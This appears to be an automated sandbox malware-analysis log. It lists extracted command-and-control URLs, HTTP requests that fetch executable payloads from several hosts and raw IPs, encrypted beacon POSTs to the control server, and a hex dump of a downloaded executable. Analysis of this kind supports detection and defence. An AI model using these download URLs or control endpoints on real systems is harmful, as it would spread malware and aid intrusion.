Source: Malware configuration extractor URLs: http://trad-einmyus.com/index.php
Source: Malware configuration extractor URLs: http://tradein-myus.com/index.php
Source: Malware configuration extractor URLs: http://trade-inmyus.com/index.php
Source: Malware configuration extractor URLs: http://cajgtus.com/test1/get.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 24 May 2024 15:38:37 GMTContent-Type: application/octet-streamContent-Length: 735232Last-Modified: Fri, 24 May 2024 15:30:04 GMTConnection: closeETag: "6650b27c-b3800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bf fa 6e c5 fb 9b 00 96 fb 9b 00 96 fb 9b 00 96 f6 c9 df 96 e1 9b 00 96 f6 c9 e0 96 82 9b 00 96 f6 c9 e1 96 dc 9b 00 96 f2 e3 93 96 fc 9b 00 96 fb 9b 01 96 9f 9b 00 96 4e 05 e1 96 fa 9b 00 96 f6 c9 db 96 fa 9b 00 96 4e 05 de 96 fa 9b 00 96 52 69 63 68 fb 9b 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 6a c5 13 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 1e 90 02 00 00 00 00 97 3e 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 91 02 00 04 00 00 a6 d7 0b 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 68 01 00 50 00 00 00 00 90 90 02 e8 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 69 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 5e 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3f e5 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 70 00 00 00 00 01 00 00 72 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 
40 2e 64 61 74 61 00 00 00 c0 00 8f 02 00 80 01 00 00 46 09 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 94 00 00 00 90 90 02 00 96 00 00 00 a2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: Joe Sandbox View IP Address: 188.114.97.3
Source: Joe Sandbox View ASN Name: THEZONEBG
Source: Joe Sandbox View ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL
Source: Joe Sandbox View ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /klok.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: www.safeautomationbd.com
Source: global traffic HTTP traffic detected: GET /TEMPradius.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: nessotechbd.com
Source: global traffic HTTP traffic detected: GET /get/Dztc3/3edag44.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: transfer.adttemp.com.br
Source: global traffic HTTP traffic detected: GET /attachments/1234297369122832404/1240152736272744458/Ogsxr.exe?ex=664585bd&is=6644343d&hm=ab86f976d0139ed85f7d9db2329fe1dca0c9135ad507ed65702b0c38a838bc63& HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uueesayjrfreir.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 123 | Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://iwsxcppjhqhjgrrq.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 320 | Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://thkyawmtyirckg.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 259 | Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://thkyawmtyirckg.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 259 | Host: trad-einmyus.com | Data Raw: 12 87 8a 98 1c f5 d5 c3 be 38 0d 35 0d cd 91 88 35 12 dd 31 d8 30 68 9f c8 ec aa 82 88 a0 9b 84 1a b6 54 a2 18 18 ce e2 9e d2 f3 d8 d9 95 15 05 6b 98 69 fc e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9f 66 5d 02 c8 a1 c1 64 1f 94 9a 32 4a 99 09 23 c7 06 7d 46 57 78 a6 b2 bf 5e d0 c1 96 c3 19 7f 01 38 09 bc 49 61 f3 7d 28 46 7b c4 0c f2 84 19 a3 1c 50 00 66 b0 b5 25 2c 21 e2 71 f7 8d 32 1d d7 ea 75 8b 53 5a 31 d4 11 e7 58 99 ac 82 b7 d8 1d 87 2c 80 13 7d 16 50 1a 90 50 8f cb 2d e4 e5 15 e8 80 11 05 69 91 f3 f5 8f e8 09 44 e2 82 b4 d0 b1 1b 49 ca 9b c4 b2 3a 55 3c 47 4d 90 84 4e 6b 29 a9 ed c3 4c e6 55 78 34 80 62 2a c6 cf 51 b8 5e a9 52 ea a2 13 70 8d 6c f1 96 8a 36 bc fc 6f 0a d9 56 6a cc fd fa d9 52 f8 ed 47 3e b9 1a 89 9e 55 68 d8 b2 4d bd 46 b0 46 41 31 | Data Ascii: 85510hTki\Fu$f]d2J#}FWx^8Ia}(F{Pf%,!q2uSZ1X,}PP-iDI:U<GMNk)LUx4b*Q^Rpl6oVjRG>UhMFFA1
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rioevlgrijblpvj.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 122 | Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tipxeencccax.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 369 | Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uqmdmpeitsjpr.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 161 | Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://exglegmgsoinxfa.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 202 | Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://foqijkgaubdv.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 205 | Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: sdfjhuz.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://woopcmiqbunxss.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 239 | Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ygfxxlyxtugpt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mjfdxwjlegvlo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iomelhkuumg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://psvrsaaxqdgtape.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ihtjdfldhcmdsyu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ltqpgqldqfpdbn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://guuoxthmrquxeg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vjnupjdvrapfef.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pdwlmngyryf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bpekfuqcomkt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oagagegmxjf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uixyrqbtokxe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wxiiulglaeast.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tgavifdbsqysl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rjuutmrbshngx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lvmnvbwulwkgv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bsmclpnjtgf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbhwmwqlrnqx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tghxfbpwpyne.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tosbfmevenvb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uijilgjtmap.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://smqxfaescqr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rgwmudjewscyl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lwpyeiimsmb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: GET /wek.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.92.253.69
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yulmcjqodavf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: GET /feswad.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.154.13.143
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uvaxpgauwksv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xsufixnxoxd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: GET /lend/jfesawdr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pilatjvtgqwtdre.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: trad-einmyus.com
Source: unknown TCP traffic detected without corresponding DNS query: 91.92.253.69
Source: unknown TCP traffic detected without corresponding DNS query: 185.154.13.143
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.167
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 9_2_0040CF10
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /klok.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.safeautomationbd.com
Source: global traffic HTTP traffic detected: GET /TEMPradius.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nessotechbd.com
Source: global traffic HTTP traffic detected: GET /get/Dztc3/3edag44.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.adttemp.com.br
Source: global traffic HTTP traffic detected: GET /attachments/1234297369122832404/1240152736272744458/Ogsxr.exe?ex=664585bd&is=6644343d&hm=ab86f976d0139ed85f7d9db2329fe1dca0c9135ad507ed65702b0c38a838bc63& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: 33A3.exe, 00000010.00000003.2558089861.0000000003420000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 33A3.exe, 00000010.00000003.2558921582.0000000003420000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: 33A3.exe, 00000010.00000003.2559114058.0000000003420000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: trad-einmyus.com
Source: global traffic DNS traffic detected: DNS query: sdfjhuz.com
Source: global traffic DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: global traffic DNS traffic detected: DNS query: api.2ip.ua
Source: global traffic DNS traffic detected: DNS query: 157.123.68.40.in-addr.arpa
Source: global traffic DNS traffic detected: DNS query: www.safeautomationbd.com
Source: global traffic DNS traffic detected: DNS query: cajgtus.com
Source: global traffic DNS traffic detected: DNS query: nessotechbd.com
Source: global traffic DNS traffic detected: DNS query: transfer.adttemp.com.br
Source: global traffic DNS traffic detected: DNS query: cdn.discordapp.com
Source: global traffic DNS traffic detected: DNS query: api.msn.com
Source: unknown HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uueesayjrfreir.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 24 May 2024 15:38:48 GMTalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 24 May 2024 15:38:58 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://nessotechbd.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingX-Endurance-Cache-Level: 2Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 24 May 2024 15:39:28 GMTServer: Transfer.sh HTTP Server 1.0Content-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffX-Made-With: <3 by DutchCodersX-Served-By: Proudly served by DutchCodersContent-Length: 15Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 24 May 2024 15:39:36 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=pGm99wmCAuWP2Xlm2F3H6Nj9DPbdQ46hGe7nOuAhATk-1716565176-1.0.1.1-DlNAaO6bu8OAFP_xmvFB7grrrpanrPetiZUyTUkHFvojunqzTItQfwj9eB8esQ.4wpT2mFviM6LezISvdQjt_g; path=/; expires=Fri, 24-May-24 16:09:36 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5L0uV8QrmrBrxrdD4Opq5u%2BY0334aVpWrGqharJomzjGUMN7vtPMkndODipg%2FCuHLhz3pzPpXHUt%2Bm1wBd9id0W0TBzyGqBU16NzoCa0XyEQYaNQt26d5BZrQmzzDGCJZnJ5fQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=WUxgC_R7cGcnsTb65gzUOT34Uc2FnsTMpXY2h4cy8K8-1716565176237-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 888e611f5941420b-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 38 0d 0a 04 00 00 00 79 fa f7 1c 0d 0a 30 0d 0a 0d 0a Data Ascii: 8y0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73|"s2h3T'cSc"8iz`;?Dt0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 83 40 0d 63 07 ea e8 8f bd a7 5e a0 10 91 60 a2 5f 53 90 1f bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82O@c^`_S10
